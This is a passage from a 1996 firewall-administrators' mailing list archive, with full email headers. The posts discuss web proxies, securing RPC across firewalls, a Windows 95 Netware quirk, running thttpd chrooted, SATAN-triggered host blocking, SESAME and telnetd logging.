Applications Conference in December. It's available from: ftp://ftp.engarde.com/pub/IPWatcher_CSAC_Paper.ps.Z Information on TTY-Watcher can be gotten through my company's home page: http://www.engarde.com -Mike Neuman mcn@EnGarde.com En Garde Systems http://www.engarde.com/~mcn From firewalls-owner Mon Feb 5 15:25:44 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA08751 for firewalls-outgoing; Mon, 5 Feb 1996 14:53:35 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA08744 for ; Mon, 5 Feb 1996 14:53:26 -0800 (PST) Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQabqx03693; Mon, 5 Feb 1996 17:52:26 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA21733; Mon, 5 Feb 96 17:41:52 EST Date: Mon, 5 Feb 1996 17:41:51 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Re: Need a few pointers In-Reply-To: <199602052228.GAA19175@relay3.jaring.my> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There was a very good response to my query. I had no idea there were so many security problems and performance problems associated with WindBlows 95. Sounds like the operating system was written by a couple of drunken cats. In a couple of days I will get the responses together in one file, together with a couple of good web pointers, and pass it on to anyone who wants an e-mailed copy. Sick Puppy, the Cat_Eating_Dawg From firewalls-owner Mon Feb 5 15:35:04 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA09120 for firewalls-outgoing; Mon, 5 Feb 1996 14:58:34 -0800 (PST) Received: from staff.cs.su.OZ.AU (staff.cs.su.OZ.AU [129.78.8.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA09065 for ; Mon, 5 Feb 1996 14:58:06 -0800 (PST) Message-Id: <199602052258.OAA09065@miles.greatcircle.com> Received: from staff.cs.su.oz.au by staff.cs.su.OZ.AU (mail from rex for firewalls@GreatCircle.COM) with MHSnet; Tue, 06 Feb 1996 09:56:57 +1100 Date: Tue, 06 Feb 1996 09:51:53 +1000 From: rex@staff.cs.su.oz.au (Rex di Bona) Subject: www proxies To: gblolmxb@ibmmail.com Reply-To: rex@cs.su.oz.au Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Every commercial firewall should support http/ftp/shttp proxies. If they don't they'll rapidly lose business. the web is overtaking e-mail as the main reason people want to connect to the web. Rex. > From: gblolmxb@ibmmail.com > > > ---- Mail Item Text Follows > Subject WWW Proxy > > I know about telnet & ftp proxies that will allow internal users to > log on to a firewall and access the internet, thus allowing us to > continue using static routing only on our routers (we would only need > to add one more, for the firewalls 'inside' address> Does such a proxy > exist for WWW so that: > > 1. Users can use which-ever browers they like. > 2. The 'standard' winsock.dll, such as provided by FTP with their > Onnet product, can still be used. > > If so, which comercial firewalls support this? From firewalls-owner Mon Feb 5 15:38:59 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA10297 for firewalls-outgoing; Mon, 5 Feb 1996 15:15:00 -0800 (PST) Received: from hosaka.smallworks.com (hosaka.SmallWorks.COM [192.207.126.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA10291 for ; Mon, 5 Feb 1996 15:14:53 -0800 (PST) Received: from butthead.SmallWorks.COM by hosaka.smallworks.com (5.x/SMI-SVR4) id AA06707; Mon, 5 Feb 1996 17:14:00 -0600 Received: by butthead.SmallWorks.COM (4.1/SPARCbook_POP1.3) id AA00392; Mon, 5 Feb 96 17:12:38 CST From: "Jim Thompson" Message-Id: <9602051712.ZM390@butthead.smallworks.com> Date: Mon, 5 Feb 1996 17:12:38 -0600 In-Reply-To: Juan Carlos Machado "CISCO Access Server Configuration" (Feb 5, 2:06pm) References: X-Mailer: Z-Mail (3.2.1 10oct95) To: Juan Carlos Machado , firewalls@GreatCircle.COM Subject: Re: CISCO Access Server Configuration Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk use tacacs+. From firewalls-owner Mon Feb 5 16:08:29 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA13339 for firewalls-outgoing; Mon, 5 Feb 1996 15:52:33 -0800 (PST) Received: from gaia.aoainc.com (gaia.aoainc.com [199.93.216.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA13324 for ; Mon, 5 Feb 1996 15:52:26 -0800 (PST) Received: (from uucp@localhost) by gaia.aoainc.com (8.6.12/8.6.9) id SAA25799; Mon, 5 Feb 1996 18:51:31 -0500 Received: from aoa.aoainc.com(199.93.217.20) by gaia.aoainc.com via smap (V1.3) id sma025793; Mon Feb 5 18:51:03 1996 Received: from albedo.aoainc.com. (albedo.aoainc.com [199.93.217.155]) by aoa.aoainc.com (8.6.9/8.6.9) with SMTP id SAA03059; Mon, 5 Feb 1996 18:51:02 -0500 Message-ID: Date: Mon, 5 Feb 96 18:49:44 -0400 From: "Richard L. Snow" Subject: Re: Need a few pointers To: "sandy bryant" , "Sick Puppy" , firewalls@GreatCircle.COM X-Mailer: VersaTerm Link v1.1.1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >At 12:40 PM 2/5/96 -0500, Sick Puppy wrote: >>My hind brain keeps telling my forebrain that somewhere it read that >>Windows 95 and Windows NT [] >>sandy bryant wrote: >Maybe you're thinking of the problem Novell networks had with Windows 95? >Since Windows 95 answers the Netware client GetNearestServer call with a >packet claiming to be a Netware server [] My understanding is that Win95 will do this if you set up your workstation to share local printer or disk. The workaround is to make sure localy shared disk/print is turned off in the Network control panel. On a network you can set up a "policy" document which will prevent any user from turning this "feature" on. (Having never done this myself, I parrot the msoft corp line :-) Regards, -Rich Rich Snow rich@aoainc.com (617)864-0201 -----------------------------------------------* Adaptive Optics Associates, Inc. 54 Cambridgepark Dr., Cambridge, MA. 02140 From firewalls-owner Mon Feb 5 16:12:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA11178 for firewalls-outgoing; Mon, 5 Feb 1996 15:24:36 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA11171 for ; Mon, 5 Feb 1996 15:24:30 -0800 (PST) Received: from pm2-08.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA18437; Mon, 5 Feb 96 18:22:59 -0500 Date: Mon, 5 Feb 96 18:22:59 -0500 Message-Id: <9602052322.AA18437@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@GreatCircle.com From: Frank Willoughby Subject: Re: RPC Across a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Verily, at 12:39 PM 2/5/96, Richard Giering Jr. allegedly did write: >I know the kind of reaction I'm libel to get but I said I'd check into it.... > >We have developers who are writing apps based upon RPC and demanding that RPC >be opened on the firewall. The idea is to enable users with their own Internet >provider to be able to access Internal applications using RPC/client-server >apps. > >I have some concerns listed below. Can anyone think of anymore? > >1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms >2) RPC and portmapper are hard if not impossible to proxy. >3) RPC is insecure >4) portmapper has many known security holes. > >My reaction has been "if they want to dialup, we'll setup internal modems" > >Is anyone aware of firewall products allow and protect RPC? > >Rick Giering, Firewall Ranger >CCH Inc. Richard, What your programmers are proposing is essentially *lethal* from a security point-of-view as it opens you to a wide variety of attacks. There are many ways of solving the problem without having to resort to RPCs - even more, since you have the option of coding your own solution (an advantage most of us don't have). FWIW, I'd recommend three things for your company: o A security awareness class for your programmers (I strongly suspect that you are only seeing the tip of the iceberg. Taking a look at how existing programs they have written are communicating and handling unexpected exceptions (buffer overflow, etc) probably wouldn't hurt either.) o A brief security assessment of the network & systems in their group (if they are naive enough about RPCs, there are probably a dozen or so other gaping holes that need to be plugged up) o A secure network solution which assures that the business unit can meet their objectives - securely. This is the problem they want solved. I've designed secure networking solutions for a number of companies. Give me a call at the number below & I'll help you as much as I can. Best Regards, Frank The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. - Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified Home of the Free Internet Firewall Evaluation Checklist From firewalls-owner Mon Feb 5 16:23:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA15249 for firewalls-outgoing; Mon, 5 Feb 1996 16:18:13 -0800 (PST) Received: from dns.eng.auburn.edu (dns.eng.auburn.edu [131.204.10.13]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA15240 for ; Mon, 5 Feb 1996 16:18:04 -0800 (PST) Received: from netman.eng.auburn.edu (netman.eng.auburn.edu [131.204.12.24]) by dns.eng.auburn.edu (v8.7.3/8.6.4) with ESMTP id SAA14147 for ; Mon, 5 Feb 1996 18:17:10 -0600 (CST) From: Doug Hughes Received: from localhost (doug@localhost) by netman.eng.auburn.edu (8.6.4/8.6.4) id SAA04331; Mon, 5 Feb 1996 18:17:07 -0600 Date: Mon, 5 Feb 1996 18:17:07 -0600 Subject: Re: RPC Across a firewall? To: firewalls@greatcircle.com Message-Id: In-Reply-To: <9602051842.AA5369@notes.cch.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > >I know the kind of reaction I'm libel to get but I said I'd check into it.... > >We have developers who are writing apps based upon RPC and demanding that RPC >be opened on the firewall. The idea is to enable users with their own Internet >provider to be able to access Internal applications using RPC/client-server >apps. > >I have some concerns listed below. Can anyone think of anymore? > >1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms RPC runs on top of UDP or TCP (and other protocols, but we'll ignore them for now) >2) RPC and portmapper are hard if not impossible to proxy. well, yeah, it can be messy. You have to examine the packet in more detail too to find the RPC service number. >3) RPC is insecure Out of the box, yes, but it can be secured pretty well. >4) portmapper has many known security holes. yeah, but you can get a new version of portmap and/or rpcbind that is tcp/wrappered. This will work as long as. 1) you have source routing blocked at your external router 2) you have IP spoofing blocked at your external router Versions are available at ftp.win.tue.nl > >My reaction has been "if they want to dialup, we'll setup internal modems" Well, therein lies a different set of problems. :( (but perhaps a set of problems which you are more equipped to handle) [ If you reply to this message, do not CC me on the reply. I subscribe to this list, unless it is a private reply, in which case do not CC the list ] -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Pro is to Con as progress is to congress From firewalls-owner Mon Feb 5 17:45:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA20290 for firewalls-outgoing; Mon, 5 Feb 1996 17:35:58 -0800 (PST) Received: from solarnum.itd.uts.edu.au (solarnum.itd.uts.EDU.AU [138.25.16.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id RAA20264 for ; Mon, 5 Feb 1996 17:35:46 -0800 (PST) Received: from maverick.itd.uts.edu.au (matt@maverick.itd.uts.EDU.AU [138.25.16.41]) by solarnum.itd.uts.edu.au (8.7.3/8.7.1/uts) with ESMTP id MAA29908; Tue, 6 Feb 1996 12:32:24 +1100 (EST) Received: (from matt@localhost) by maverick.itd.uts.edu.au (8.7.3/8.7.3/Jas) id MAA00388; Tue, 6 Feb 1996 12:35:01 +1100 From: Jas (Matthew K) Message-Id: <199602060135.MAA00388@maverick.itd.uts.edu.au> Subject: Re: RPC Across a firewall? To: frankw@in.net (Frank Willoughby) Date: Tue, 6 Feb 1996 12:34:59 +1100 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <9602052322.AA18437@su1.in.net> from "Frank Willoughby" at Feb 5, 96 06:22:59 pm X-Ph: ph: +61 2 330 1390 fax: +61 2 330 1999 home: +61 2 9929 0717 X-Pager: +61 2 214 1111 #216098 or pager@maverick.itd.uts.edu.au X-Pgp-Finger: pub 2048/27FB4AE1 1995/09/30 Jas (Matthew K) X-Pgp-Finger: Key fingerprint = 3A1EEDBE7A6D498D E7953FB40A21A6C8 X-Mailer: ELM [version 2.4 PL25] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- Frank Willoughby wrote this... > Richard, > What your programmers are proposing is essentially *lethal* from a > security point-of-view as it opens you to a wide variety of attacks. > There are many ways of solving the problem without having to resort > to RPCs - even more, since you have the option of coding your own > solution (an advantage most of us don't have). > FWIW, I'd recommend three things for your company: > o A security awareness class for your programmers (I strongly > suspect that you are only seeing the tip of the iceberg. Taking > a look at how existing programs they have written are > communicating and handling unexpected exceptions (buffer > overflow, etc) probably wouldn't hurt either.) > o A brief security assessment of the network & systems in their > group (if they are naive enough about RPCs, there are probably a > dozen or so other gaping holes that need to be plugged up) > o A secure network solution which assures that the business unit can > meet their objectives - securely. This is the problem they want > solved. > I've designed secure networking solutions for a number of companies. > Give me a call at the number below & I'll help you as much as I can. frank, this is not necessarily true.. RPC can be secured, and quite easily at that _if_ you know wht you are doing... punching it through a firewall can be difficult, but you can get RPC to do things like a) force it to use one and only one port, b) force it to use only TCP, c) turn on authentification, and fold in encryption. RPC is not the bug bear that most people make it out to be, you just gotta know how to use it properly!!! i have been coding with RPC for almost 2.5 years now, and it _can_ be done, and some things (like authentification) can be done very easily in RPC (far easier than some other methods). please guys, be sure of what you say before you fire away. Matt p.s. i have no qualms in saying that some of the current implementations of RPC servers are insecure (like NFS if not done with SecureNFS or with kerberos).. - -- #!/bin/sh echo '16i[q]sa[ln0=aln100%Pln100/snlbx]sbA0D3F204445524F42snlbxq'|dc;exit Matthew Keenan Data Network Admin Information Technology Division University of Technology Sydney Australia It's nice to be in a position where people apologize because they assume there's humor in your work, based on past experience, but they're not sure where it is. -- Rob Pike -----BEGIN PGP SIGNATURE----- Version: 2.6.2i Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface iQEVAwUBMRawK4SVUk8n+0rhAQEwdgf+NjrWCdcqjvO4l60C7v3tnrL9iN0wDe3A 0wZFPAQuCkrmujMdWuVt7TAmgU+bULurKdFawCFbzQ0Xt+ms7eR8FaT7DOtqVAhK 9QByt/T00oAASgZuvButF+McB13a1CkYDHioFjjxkCeSQxtAqSwzhzvFj0PaUBjy 5ZwFrYoGDKIR9i8xWR4xgB+8IBlxt+POEwLOAMZmBj+eTYR/ttFcCyeQ4IO1glRF YF4NoTQMalfVUy73yQWEkhK0+wmp8C6hE8zozB9TPcmXRMCjxA9S7Y6dE5XskWew aH+SJWJSPCxxXgnsX7NfdnInh4EwDhXYRIsSl6/fejN56xYzOHIxEw== =0rCA -----END PGP SIGNATURE----- From firewalls-owner Mon Feb 5 18:08:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id RAA21480 for firewalls-outgoing; Mon, 5 Feb 1996 17:59:48 -0800 (PST) Received: from sandy.sandpiper.com (sandy.sandpiper.com [204.96.232.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id RAA21475 for ; Mon, 5 Feb 1996 17:59:44 -0800 (PST) Received: by sandy.sandpiper.com (4.1/SMI-4.1) id AA20246; Mon, 5 Feb 96 18:00:00 PST Date: Mon, 5 Feb 96 18:00:00 PST From: chris@sandpiper.com (Chris Newton) Message-Id: <9602060200.AA20246@sandy.sandpiper.com> To: firewalls@greatcircle.com Subject: problem with thttpd on solaris 2.x Cc: fc@all.net Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I've been trying to put a secure web server onto a sacrificial lamb in our DMZ, and so decided to use the thhtpd. Unfortunately, due to circumstances beyond my control, the server is running solaris 2.x (i would have preferred SunOS 4.1.x, but that is a different story). Anyway, when i run it normally it works just fine. But when i try to run it chroot, it complains in the libsocket library, when trying to access /dev/tcp (which isn't there of course) I was wondering if the consensus of opinion was to: a) make a /dev/tcp in the chroot tree; b) magically acquire a libsocket which doesn't behave this way; c) give up and don't try to run it chroot. any help, gratefully received chris newton network security sandpiper software consulting From firewalls-owner Mon Feb 5 18:24:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA22270 for firewalls-outgoing; Mon, 5 Feb 1996 18:12:00 -0800 (PST) Received: from mcfeely.bsfs.org (mcfeely.bsfs.org [204.91.13.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA22255 for ; Mon, 5 Feb 1996 18:11:54 -0800 (PST) Received: (from wombat@localhost) by mcfeely.bsfs.org (8.6.12/8.6.12) id VAA09272; Mon, 5 Feb 1996 21:08:18 -0500 Date: Mon, 5 Feb 1996 21:08:15 -0500 (EST) From: Rabid Wombat To: "Richard L. Snow" cc: sandy bryant , Sick Puppy , firewalls@GreatCircle.COM Subject: Re: Need a few pointers In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 5 Feb 1996, Richard L. Snow wrote: > > >At 12:40 PM 2/5/96 -0500, Sick Puppy wrote: > >>My hind brain keeps telling my forebrain that somewhere it read that > >>Windows 95 and Windows NT > [] > >>sandy bryant wrote: > >Maybe you're thinking of the problem Novell networks had with Windows 95? > >Since Windows 95 answers the Netware client GetNearestServer call with a > >packet claiming to be a Netware server > [] > > My understanding is that Win95 will do this if you set up your workstation > to share local printer or disk. The workaround is to make sure localy shared > disk/print is turned off in the Network control panel. On a network you can > set up a "policy" document which will prevent any user from turning this > "feature" on. > This looks like a work-around, at best. A number of vendors, such as those marketing comm servers and print servers that use IPX/SPX use SAP to advertise their presence, without responding to a GetNearestServer. Just another Micro$oft "feature". What's the party line on a real fix? From firewalls-owner Mon Feb 5 20:14:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA26459 for firewalls-outgoing; Mon, 5 Feb 1996 20:07:26 -0800 (PST) Received: from desiree.teleport.com (desiree.teleport.com [192.108.254.21]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA26454 for ; Mon, 5 Feb 1996 20:07:21 -0800 (PST) Received: from kludge.teleport.com (ip-pdx16-24.teleport.com [206.163.123.216]) by desiree.teleport.com (8.6.12/8.6.9) with SMTP id UAA08663; Mon, 5 Feb 1996 20:05:57 -0800 Message-Id: <199602060405.UAA08663@desiree.teleport.com> Comments: Authenticated sender is From: "Alan Olsen" Organization: Fnord Motor Company To: gblolmxb@ibmmail.com, rex@cs.su.oz.au Date: Mon, 5 Feb 1996 20:08:29 +0000 Subject: Re: www proxies Reply-to: alano@teleport.com CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Windows (v2.23) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Date: Tue, 06 Feb 1996 09:51:53 +1000 > From: rex@staff.cs.su.oz.au (Rex di Bona) > Subject: www proxies > To: gblolmxb@ibmmail.com > Reply-to: rex@cs.su.oz.au > Cc: firewalls@GreatCircle.COM > Every commercial firewall should support http/ftp/shttp proxies. If they > don't they'll rapidly lose business. the web is overtaking e-mail > as the main reason people want to connect to the web. Most of the problems with using a web browser and/or FTP are from misconfigured software and/or firewalls. With Netscape, if you do not allow connections to port 443, secure connections will not work. I am not certain of any additional port requirements for SHTTP. There is one place where Netscape has problems with firewalls. Netscape uses passive ftp. Passive mode tries to open a high port and the firewall balks at the connection. ( Oddly, Mosaic does not have this problem.) Netscape 2.0 has an "autoconfigure" for proxies. I do not have enough information on this to determine if the auto-configure is a security breach in and of itself.) Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction `finger -l alano@teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ Is the operating system half NT or half full? From firewalls-owner Mon Feb 5 20:38:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA27055 for firewalls-outgoing; Mon, 5 Feb 1996 20:24:00 -0800 (PST) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA27050 for ; Mon, 5 Feb 1996 20:23:56 -0800 (PST) Received: by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-960123) id UAA14523; Mon, 5 Feb 1996 20:20:22 -0800 Received: from relay-4.mail.demon.net(158.152.1.108) by mycroft via smap (V1.3mjr) id sma014519; Mon Feb 5 20:19:40 1996 Received: from post.demon.co.uk ([158.152.1.72]) by relay-4.mail.demon.net id ad09423; 5 Feb 96 22:59 GMT Received: from bifroest.demon.co.uk ([158.152.121.6]) by relay-3.mail.demon.net id aa28824; 5 Feb 96 22:51 GMT X-Sender: (Unverified) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 5 Feb 1996 22:52:03 +0000 To: firewalls@greatcircle.com From: Ian Miller Subject: Re: Mazama Packet Filter: Misleading advertising Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Darren Reed writes: > * We have used SATAN to analyze MPF installations and verified that > the above security problems are solved by MPF. The current version > of MPF can detect port scans from SATAN and automatically block > all packets from a host running SATAN. [snip...] >Maybe they assumed that their DHB (Dynamic Host Blocking) solved everything >when it blocks out an entire host when it notices a SATAN style attack. > Don't forget the rather spectacular opportunities for denial-of-service attacks such host blocking would offer. Ian From firewalls-owner Mon Feb 5 20:53:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA27713 for firewalls-outgoing; Mon, 5 Feb 1996 20:40:56 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA27708 for ; Mon, 5 Feb 1996 20:40:49 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id XAA08783; Mon, 5 Feb 1996 23:39:34 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma008781; Mon Feb 5 23:39:29 1996 Date: Mon, 5 Feb 1996 23:39:29 -0500 (EST) From: Chris Woods To: KM cc: firewalls@GreatCircle.COM Subject: Re: Need a few pointers In-Reply-To: <9602052109.AA00719@hfsi> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 5 Feb 1996, KM wrote: > > There are other operating systems? :) When did Microsoft buy Wang Fed? ;-) Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com/chris/ Want the government to control what you are allowed to read and see? "Why, NO!", you say? See http://www.eff.org/blueribbon.html From firewalls-owner Tue Feb 6 01:16:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id AAA06377 for firewalls-outgoing; Tue, 6 Feb 1996 00:59:35 -0800 (PST) Received: from alcatel.fr (mail.alcatel-alsthom.fr [193.104.30.131]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id AAA06352 for ; Tue, 6 Feb 1996 00:58:51 -0800 (PST) Received: from alcatel.fr (gatekeeper-ssn.alcatel.fr [155.132.180.241]) by mailgate.alcatel.fr (8.7.3/8.7.3) with ESMTP id JAA18269 for ; Tue, 6 Feb 1996 09:58:16 +0100 Received: from AHQP14 (ahqp14.ahqps.alcatel.fr [155.132.120.211]) by nsfhh5.alcatel.fr (8.7.3/8.7.3) with SMTP id JAA25482 for ; Tue, 6 Feb 1996 09:59:07 +0100 (MET) Message-Id: <199602060859.JAA25482@nsfhh5.alcatel.fr> Comments: Authenticated sender is From: "Kare Presttun" Organization: Alcanet International To: Firewalls@GreatCircle.COM Date: Tue, 6 Feb 1996 10:01:56 +0100 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: More SESAME Reply-to: Kare.Presttun@ansf.alcatel.fr X-mailer: Pegasus Mail for Windows (v2.01) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I'm sorry for posting such a brief message on SESAME. A bit more explenation follows. It is available from: http://www.esat.kuleuven.ac.be/cosic/sesame.html You can regard it as a kind of enhanced Kerberos, that supports a mix of public and secret key cryptography, delegation of rights, separation of the authentication method from the rest of the system, multiple security domains , cross domain security. It can directly replace Kerberos in DCE. It has an enhanced GSS-API to take advantage of the enhanced services. It is in the public domain (as of today), and Internet drafts are filed to progress it to an RFC. It is an ECMA standard. For more information and source code, check out the above URL. I know this list is about firewalls, but I also know that many of you have wider security interests than just firewalls. Regards, Kare ---------------------------------------------------------- | Kare Presttun Alcanet International | | Tel: +33 1 4058 5614 33, rue Emeriau | | Fax: +33 1 4058 5945 F-75015 Paris | | Kare.Presttun@ansf.alcatel.fr FRANCE | From firewalls-owner Tue Feb 6 04:38:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA12379 for firewalls-outgoing; Tue, 6 Feb 1996 04:27:25 -0800 (PST) Received: from sarswati.mindware.soft.net (sarswati.mindware.soft.net [164.164.52.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA12374 for ; Tue, 6 Feb 1996 04:27:18 -0800 (PST) Received: from gangotri.mindware.soft.net by sarswati.mindware.soft.net id aa03553; 6 Feb 96 17:54 IST Received: by gangotri.mindware.soft.net with Microsoft Mail id <31180839@gangotri.mindware.soft.net>; Tue, 06 Feb 96 18:02:33 PST From: Prakash N Purushotham To: "'firewalls@greatcircle.com'" Subject: telnetd Date: Tue, 06 Feb 96 17:53:00 PST Message-ID: <31180839@gangotri.mindware.soft.net> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there any way I can configure telnetd to log the client's IP Address, the login id used, time stamps in syslog? Prakash prakashp@mindware.soft.net From firewalls-owner Tue Feb 6 06:14:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14000 for firewalls-outgoing; Tue, 6 Feb 1996 05:55:52 -0800 (PST) Received: from gatekeeper.qms.com (gatekeeper.qms.com [161.33.3.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA13995 for ; Tue, 6 Feb 1996 05:55:48 -0800 (PST) Received: from sun470.rd.qms.com (sun470.qms.com) by gatekeeper.qms.com (4.1/SMI-4.1) id AA01799; Tue, 6 Feb 96 07:54:59 CST Received: from joker.rd.qms.com by sun470.rd.qms.com (4.1/SMI-4.1) id AA05945; Tue, 6 Feb 96 07:54:57 CST From: smithj@rd.qms.com (John Smith) Received: by joker.rd.qms.com (4.1) id AA01952; Tue, 6 Feb 96 07:54:56 CST Date: Tue, 6 Feb 96 07:54:56 CST Message-Id: <9602061354.AA01952@joker.rd.qms.com> To: Firewalls@greatcircle.com Subject: Socks and Internet News Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Is there a way to safely tunnel NNTP through SOCKS? Since I'm having to 'experiment' on our running firewall I want to make sure I get it right without opening 10k new holes. Thanks for any advice. John Smith john_smith@rd.qms.com From firewalls-owner Tue Feb 6 06:24:27 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA14054 for firewalls-outgoing; Tue, 6 Feb 1996 05:58:41 -0800 (PST) Received: from smtp-gw01.ny.us.ibm.net ([165.87.194.252]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA14049 for ; Tue, 6 Feb 1996 05:58:37 -0800 (PST) From: pcuser@slip133-171.dc.us.ibm.net Received: (from uucp@localhost) by smtp-gw01.ny.us.ibm.net (8.6.9/8.6.9) id NAA41556 for <@smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM>; Tue, 6 Feb 1996 13:57:47 GMT Message-Id: <199602061357.NAA41556@smtp-gw01.ny.us.ibm.net> Received: from slip133-177.dc.us.ibm.net(129.37.133.177) by smtp-gw01.ny.us.ibm.net via smap (V1.3mjr) id smaOzkDFW; Tue Feb 6 13:57:34 1996 Date: Tue, 6 Feb 96 10:04:23 PST Subject: Firewalls Product Comparison To: @smtp-gw01.ny.us.ibm.net:Firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi guys, I need to prepare a comparative study between Sunīs Firewall 1 and IBM NetSP, for the end of this week. Does anyone Knows where I could find some interesting articles concerning both of these products?? Any help woul be appreciated. Wilmer Caripe EMSCA - ENGINEERING AND MANUFACTURING SYSTEMS CARACAS, VENEZUELA From firewalls-owner Tue Feb 6 06:40:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA14807 for firewalls-outgoing; Tue, 6 Feb 1996 06:38:05 -0800 (PST) Received: from protosoft.com ([204.128.207.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA14802 for ; Tue, 6 Feb 1996 06:38:01 -0800 (PST) Received: by protosoft.com (4.1/SMI-4.1) id AA10053; Tue, 6 Feb 96 08:36:18 CST Date: Tue, 6 Feb 1996 08:36:17 -0600 (CST) From: Mohammed Ali To: Prakash N Purushotham Cc: "'firewalls@greatcircle.com'" Subject: Re: telnetd In-Reply-To: <31180839@gangotri.mindware.soft.net> Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 6 Feb 1996, Prakash N Purushotham wrote: > > Is there any way I can configure telnetd to log the client's > IP Address, the login id used, time stamps in syslog? > How about using TCP 